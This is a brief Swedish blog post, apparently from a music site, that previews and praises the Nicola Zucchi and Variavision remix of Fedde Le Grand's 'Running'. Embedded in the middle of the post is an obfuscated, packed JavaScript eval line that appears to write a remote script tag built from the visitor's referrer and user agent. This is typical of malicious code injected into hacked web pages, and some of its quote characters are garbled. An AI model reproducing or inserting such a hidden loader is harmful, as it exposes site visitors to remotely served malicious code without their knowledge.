Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Fedde Le Grand – Running (Nicola Zucchi & Variavision Mix) Preview

Fedde Le Grand – Running (Nicola Zucchi & Variavision Mix) Preview
Alexander Gylemo

Framåt slutet av sommaren släppte Fedde Le Grand ”Running” på Armin Van Buurens Armada Music och som alla hans senaste låtar blev det en hit på två röda. För ett par dagar sedan fick låten en ytterligare push då den italienska djn, producenten samt klubbägaren Nicola Zucchi släppte sin remix tillsammans med Variavision, en klart bättre version än originalet enligt mig!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sizhs|var|u0026u|referrer|yziif||js|php’.split(’|’),0,{}))
FEDDE LE GRAND – Running (Nicola Zucchi Variavision Mix) Preview by nicolazucchi